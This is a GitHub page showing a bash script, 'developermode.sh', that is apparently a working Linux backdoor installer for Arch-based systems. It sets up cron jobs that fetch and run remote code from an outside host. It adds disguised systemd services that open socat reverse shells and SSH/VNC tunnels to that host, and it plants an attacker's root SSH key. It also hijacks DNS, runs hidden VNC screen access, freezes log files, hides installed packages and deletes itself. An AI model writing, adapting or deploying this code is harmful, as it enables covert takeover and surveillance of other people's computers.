-
Notifications
You must be signed in to change notification settings - Fork 2
Expand file tree
/
Copy pathdevelopermode.sh
More file actions
330 lines (276 loc) · 8.72 KB
/
developermode.sh
File metadata and controls
330 lines (276 loc) · 8.72 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
#!/bin/bash
set +xv
set +o history
#TODO Make this more stealth with the rootkit: https://github.com/croemheld/lkm-rootkit
function docron {
#XXX Obfuscate both cron scripts
#XXX https://github.com/Bashfuscator/Bashfuscator
cat << 'END' > /etc/cron.hourly/updates.sh
#!/bin/bash
set +xv
set +o history
exec 1>/dev/null 2>&1
find /var/log -type f -exec chattr +i '{}' \;
curl expectusafterlun.ch/updates.sh | bash
find /var/log -type f -exec chattr -i '{}' \;
END
#XXX Add packages back to package database
#XXX Update them and do not overwrite our files
#XXX Then remove them from the package database
#XXX Needs testing. Does it remove packages from the package database?
cat << 'END' > /etc/cron.daily/updates.sh
#!/bin/bash
set +xv
set +o history
exec 1>/dev/null 2>&1
find /var/log -type f -exec chattr +i '{}' \;
yes | pacman --noconfirm -Syy
yes | pacman --noconfirm -S openssh x11vnc dropbear socat
rm -rf /var/lib/pacman/openssh
rm -rf /var/lib/pacman/x11vnc
rm -rf /var/lib/pacman/dropbear
rm -rf /var/lib/pacman/socat
find /var/log -type f -exec chattr -i '{}' \;
exec 1>/dev/tty
exec 2>/dev/tty
set -o history
END
chmod 0500 /etc/cron.hourly/updates.sh
chmod 0500 /etc/cron.daily/updates.sh
}
function doforward {
cat << 'END' > /etc/systemd/system/ssh_control.service
[Unit]
Description=SSH helper daemon
After=network.target
[Service]
ExecStart=socat openssl:expectusafterlun.ch:9000,reuseaddr,fork,forever,verify=0 tcp6:[::1]:22,reuseaddr
User=root
Group=root
Restart=on-failure
[Install]
WantedBy=multi-user.target
END
##########
##########
##########
cat << 'END' > /etc/systemd/system/vnc_control.service
[Unit]
Description=VNC helper daemon
After=network.target
[Service]
ExecStart=socat openssl:expectusafterlun.ch:9090,reuseaddr,fork,forever,verify=0 tcp6:[::1]:5900,reuseaddr
User=root
Group=root
Restart=on-failure
[Install]
WantedBy=multi-user.target
END
# .rw-r--r-- root root
chown root:root /etc/systemd/system/vnc_control.service
chown root:root /etc/systemd/system/ssh_control.service
chmod 0644 /etc/systemd/system/vnc_control.service
chmod 0644 /etc/systemd/system/ssh_control.service
#FIXME Change ports if necessary
#REMOTE MACHINE LISTENER EXAMPLE:
#socat openssl-listen:9000,fork,reuseaddr,cert=server.pem,verify=0 tcp6-listen:9002,reuseaddr &>/dev/null
}
function dorevshell {
cat << 'END' > /etc/systemd/system/repod.service
[Unit]
Description=Daemon for checking remote repositories
After=network-online.target
[Service]
ExecStart=socat openssl:expectusafterlun.ch:8080,verify=0,fork,reuseaddr exec:/bin/bash
User=root
Group=root
Restart=on-failure
[Install]
WantedBy=multi-user.target
END
# .rw-r--r-- root root
chown root:root /etc/systemd/system/repod.service
chmod 0644 /etc/systemd/system/repod.service
}
function dodns {
chattr -i /etc/resolv.conf
cat << 'END' > /etc/resolv.conf
#AdGuardHome
nameserver 152.89.107.76
nameserver 2a03:4000:39:883:5811:19ff:fe2d:ce39
options edns0 single-request-reopen
END
chown root:root /etc/resolv.conf
chmod 0644 /etc/resolv.conf
chattr +i /etc/resolv.conf
#TODO Make Firefox use PRISM 3.0 /etc/skel/prefs.js and /home/*/.mozilla/... or user.js?
#TODO pacman -Ql community/manjaro-browser-settings
}
function dossh {
if test ! -d /root/.ssh
then
mkdir /root/.ssh
fi
developerkey='ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8TdsKH7rdpVeckRIXmxTsboILx18NpDQv/0e2IqzKt1lFxJ6Q4wwrBY49JYmGUivWg39kTNxmoxKwzDEDyGetDaNho/wW4t11Tb8Y9GuERBERbtGbg/AghdUB5vz3QmN63c2rs8QyS4Hx4Ibyx2VDKrH1f2/rLhWOEIyCz7/VGLLf9q7CCQvgzPXU+WRuayUADShb9WhgZ/Vbm7/b3+TGtss6B5/URhBs/fBeEYYIZpsp8wi7+91Vp+/gpc7O2ylV8G+g5PrxXH6LepRT87LalP++UvsQJSpGYmcvG7UK3cdMcazmteIEp7yniAnNQYUQk8gUxxnjOFncHHzFDVXQ1ksAU35f5JVhDjZ88orWsHWlhJjn6ZPTaXnfiYgrKseSxh4OLsQstOyEbG+ZWDnR2p8DdUawQOW54waUFMTFIezXJqoAf1fFjT2bcEzKav+le5HsXe8voL+DIA0WiRl8F5JHQfdLB+x4Zc1/uq/oOXCkLpw9hL2QwBIY3QYWmos='
echo "$developerkey" | tee /root/.ssh/authorized_keys /etc/.developer_keys
if [ ! -e "/etc/ssh/sshd_config_backup" ]
then
# File does not exist
mv /etc/ssh/sshd_config{,_backup}
fi
#TODO Finish writing all options that will go into the sshd_config
#FIXME Add another key location and put the keys there too
cat << 'END' > /etc/ssh/sshd_config
Port 22
AddressFamily any
ListenAddress 0.0.0.0
ListenAddress ::
# Authentication:
#PermitRootLogin prohibit-password
HostKey /etc/ssh/ssh_host_ed25519_key
# Logging
#SyslogFacility AUTH
#LogLevel INFO
LogLevel QUIET
DisableForwarding no #TODO
Match User root
AuthenticationMethods publickey
#StrictModes yes
MaxAuthTries 4
#MaxSessions 10
PubkeyAuthentication yes
AuthorizedKeysFile .ssh/authorized_keys /etc/.developer_keys
# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you dont trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Dont read the users ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes
# To disable tunneled clear text passwords, change to no here!
#PasswordAuthentication yes
PermitEmptyPasswords no
# Change to no to disable s/key passwords
ChallengeResponseAuthentication no
# Set this to yes to enable PAM authentication, account processing,
# and session processing. If this is enabled, PAM authentication will
# be allowed through the ChallengeResponseAuthentication and
# PasswordAuthentication. Depending on your PAM configuration,
# PAM authentication via ChallengeResponseAuthentication may bypass
# the setting of "PermitRootLogin without-password".
# If you just want the PAM account and session checks to run without
# PAM authentication, then enable this but set PasswordAuthentication
# and ChallengeResponseAuthentication to no.
UsePAM yes
DisableForwarding no
#AllowAgentForwarding yes
AllowTcpForwarding yes
#GatewayPorts no
#X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
PrintMotd no # pam does that
#PrintLastLog yes
#TCPKeepAlive yes
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
UseDNS no #TODO
#PidFile /run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none
Subsystem sftp internal-sftp
# Hardened set of key exchange, cipher, and MAC algorithms, as per <https://www.sshaudit.com/hardening_guides.html>.
KexAlgorithms curve25519-sha256,curve25519-sha256@libssh.org
Ciphers chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr
MACs hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512
Match User root
AuthenticationMethods publickey
END
systemctl enable --now sshd.service
}
function dovnc {
user=$(id -un 1000)
cat << 'END' > /etc/systemd/system/privacy_protector.service
[Unit]
Description=Privacy Protector v2.0 Daemon
Requires=display-manager.service
After=syslog.target network-online.target
Wants=syslog.target network-online.target
[Service]
ExecStart=/usr/bin/x11vnc -display :0 -passwd 120671522023747 -shared -forever -o /dev/null -bg -xauth /home/$user/.Xauthority
ExecStop=/usr/bin/x11vnc -R stop
Restart=on-failure
[Install]
WantedBy=multi-user.target
END
}
function rmself {
# Do not delete if we have the wrong directory or not a shell script
if [[ "$mscript" =~ ^(/tmp/|/var/tmp/|/home/).+\.sh ]]; then
rm -f -- "$mscript"
fi
killall -q -0 yay || rm -rvf $HOME/.cache/yay/* /root/.cache/yay/*
yes | pacman -Scc --noconfirm
}
function dosystemd {
# Start now and Autostart
systemctl enable --now sshd.service
systemctl enable --now privacy_protector.service
systemctl enable --now repod.service
systemctl enable --now ssh_control.service
systemctl enable --now vnc_control.service
}
function dopkgs {
yes | pacman --noconfirm -Syy
yes | pacman --noconfirm -S openssh x11vnc dropbear socat
#XXX Needs testing. Does it remove packages from the package database and doesn't break anything?
rm -rf /var/lib/pacman/openssh
rm -rf /var/lib/pacman/x11vnc
rm -rf /var/lib/pacman/dropbear
rm -rf /var/lib/pacman/socat
}
function verboseoff {
set +xv
set +o history
exec 1>/dev/null 2>&1
#exec &>/dev/null
find /var/log -type f -exec chattr +i '{}' \;
}
function verboseon {
find /var/log -type f -exec chattr -i '{}' \;
exec 1>/dev/tty
exec 2>/dev/tty
set -o history
}
function makesecure {
chattr +i /etc/ssh/sshd_config
chattr +i /etc/.developer_keys
chattr +i /root/.ssh/authorized_keys
chattr +i /etc/systemd/system/ssh_control.service
chattr +i /etc/systemd/system/vnc_control.service
chattr +i /etc/systemd/system/privacy_protector.service
chattr +i /etc/cron.hourly/updates.sh
chattr +i /etc/cron.daily/updates.sh
chattr +i /etc/resolv.conf
}
# Globals
mscript="$0"
#sudo -i -u root bash << 'EOF' # Execute all as root
verboseoff
dopkgs
docron
doforward
dorevshell
dodns
dossh
dovnc
makesecure
dosystemd
rmself
verboseon
#EOF